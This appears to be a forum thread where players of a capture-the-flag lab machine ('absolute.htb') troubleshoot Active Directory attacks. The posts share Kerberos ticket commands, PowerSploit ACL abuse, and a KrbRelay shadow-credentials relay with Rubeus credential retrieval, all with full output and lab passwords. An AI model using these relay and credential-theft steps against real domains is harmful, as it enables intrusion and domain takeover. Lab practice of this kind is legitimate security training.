Posts: 22 Threads: 0 Joined: N/A September 29, 2022 at 9:47 AM

(September 29, 2022, 08:57 AM)Exa Wrote: I'm also getting "The user name or password is incorrect" error when running the Add-DomainObjectAcl command.
What I did:
- I set up a new Windows 10 Pro VM.
- I downloaded and imported PowerSploit via Import-Module .\PowerSploit.psm1.
- I set internet time to dc.absolute.htb.
- I removed dc.absolute.htb from the hosts file. Doing so, the error changes to "The server is not operational"
Any ideas?

Had the same issue on my commando vm. I added the DC IP to my DNS Servers in the network card settings

Posts: 213 Threads: 0 Joined: N/A September 29, 2022 at 11:29 AM

(September 29, 2022, 09:47 AM)ThatUsername Wrote: (September 29, 2022, 08:57 AM)Exa Wrote: I'm also getting "The user name or password is incorrect" error when running the Add-DomainObjectAcl command.
What I did:
- I set up a new Windows 10 Pro VM.
- I downloaded and imported PowerSploit via Import-Module .\PowerSploit.psm1.
- I set internet time to dc.absolute.htb.
- I removed dc.absolute.htb from the hosts file. Doing so, the error changes to "The server is not operational"
Any ideas?
Had the same issue on my commando vm. I added the DC IP to my DNS Servers in the network card settings

Thanks, that worked.

Posts: 22 Threads: 0 Joined: N/A September 29, 2022 at 11:45 AM

(September 28, 2022, 01:42 PM)Hacker2222 Wrote: (September 28, 2022, 01:36 PM)Exa Wrote: (September 28, 2022, 12:41 PM)Photographer Wrote: (September 27, 2022, 05:57 PM)Exa Wrote: (September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).
These are the commands I used:
sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb
Does anyone have an idea why this is happening?

Finally got this working. Apparently, dc.absolute.htb must be set as target (instead of absolute.htb or the IP address):
smbclient.py -k dc.absolute.htb

ok that fixed it for me too!!! thanks

Nice to hear. The lesson learnt is to use FQDNs when dealing with Kerberos tickets. This is the article I came across when troubleshooting: https://www.onsecurity.io/blog/abusing-kerberos-from-linux/
JAJAJAJA kerberos hates ips LOL u always have to use domains with kerberos. at least microsoft kerberos

I'm a baby step away from root. But the tools that should work won't do the job :D

Posts: 22 Threads: 0 Joined: N/A September 29, 2022 at 12:37 PM

Sure,
on my WinRM Session i uploaded these files
[hide]
https://github.com/cube0x0/KrbRelay
https://github.com/antonioCoco/RunasCs
https://github.com/GhostPack/Rubeus/
[/hide]
Then i tried to abuse shadow credentials again with the command:
[hide]./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"[/hide]
It presents me the successful output which i can use.
[*]Relaying context: absolute.htb\DC$
[*]Rewriting function table
[*]Rewriting PEB
[*]GetModuleFileName: System
[*]Init com server
[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe
[*]Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC02bxMxvj+ZK5wyYd+tqS6AoQAANQC///Uv7nn/Sb4xSIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*]Forcing SYSTEM authentication
[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed
[*]apReq: 608206b406092a864886f7120102b4067f59cf8dc3e6d494822c9b9
[*]bind: 0
[*]ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*]apRep1: 6f8188308185a0e458b6a437b61a2484
[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*]apRep2: 6f5b3059a003020105a10302010d6d6dec624fa79d20484a56b9df2a60fd2c6797302923
[*]bind: 0
[*]ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*]ldap_modify: LDAP_SUCCESS
[*]Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /show
But the second step fails.
[hide]./Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /show
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.6.1
[*]Action: Ask TGT
[!] Failed to find certificate for MIIJsAIBAzCCCWwGCSqGSIb3DQEHAaCCCV.....
[/hide]
By using an additional argument it fails too
[hide]./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred -ntlm"
[*]Relaying context: absolute.htb\DC$
[*]Rewriting function table
[*]Rewriting PEB
[*]GetModuleFileName: System
[*]Init com server
[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe
[*]Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABNYcMj1VSE/4zbzVAM+HFyAlAAALwS///+EbEb5HpRmCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*]Forcing SYSTEM authentication
[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed
[*]NTLM14e544c4d535350000100000007b218a2080008002a00000002000200280000000a0063450000000f44434142534f4c555445
[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection, AllowNonUserLogons
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
   at KrbRelay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults)
   at KrbRelay.Program.Main(String[] args)
[/hide]

Posts: 33 Threads: 0 Joined: N/A September 29, 2022 at 1:00 PM

(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,
on my WinRM Session i uploaded these files

Posts: 23 Threads: 0 Joined: N/A September 29, 2022 at 2:25 PM

(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,
on my WinRM Session i uploaded these files

How did you find this specific CLSID? 752073A1-23F2-4396-85F0-8FDB879ED0ED

Posts: 166 Threads: 0 Joined: N/A September 29, 2022 at 2:52 PM

i think it's possible to make from linux with dacledit.py and you don't necessarily need a windows machine for the winrm part. well I think it's not necessary :D

Posts: 1 Threads: 0 Joined: N/A September 29, 2022 at 3:06 PM

Yeah, I can confirm that you don't need any Windows machine

Posts: 22 Threads: 0 Joined: N/A September 29, 2022 at 3:34 PM

(September 29, 2022, 02:25 PM)delmerherberth Wrote: (September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,
on my WinRM Session i uploaded these files
How did you find this specific CLSID? 752073A1-23F2-4396-85F0-8FDB879ED0ED

https://notes.vulndev.io/notes/redteam/payloads/windows

(September 29, 2022, 03:06 PM)Cornstalk Wrote: Yeah, I can confirm that you don't need any Windows machine

Then feel free to give me a little hint :)

Posts: 1 Threads: 0 Joined: N/A September 29, 2022 at 4:39 PM

(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,
on my WinRM Session i uploaded these files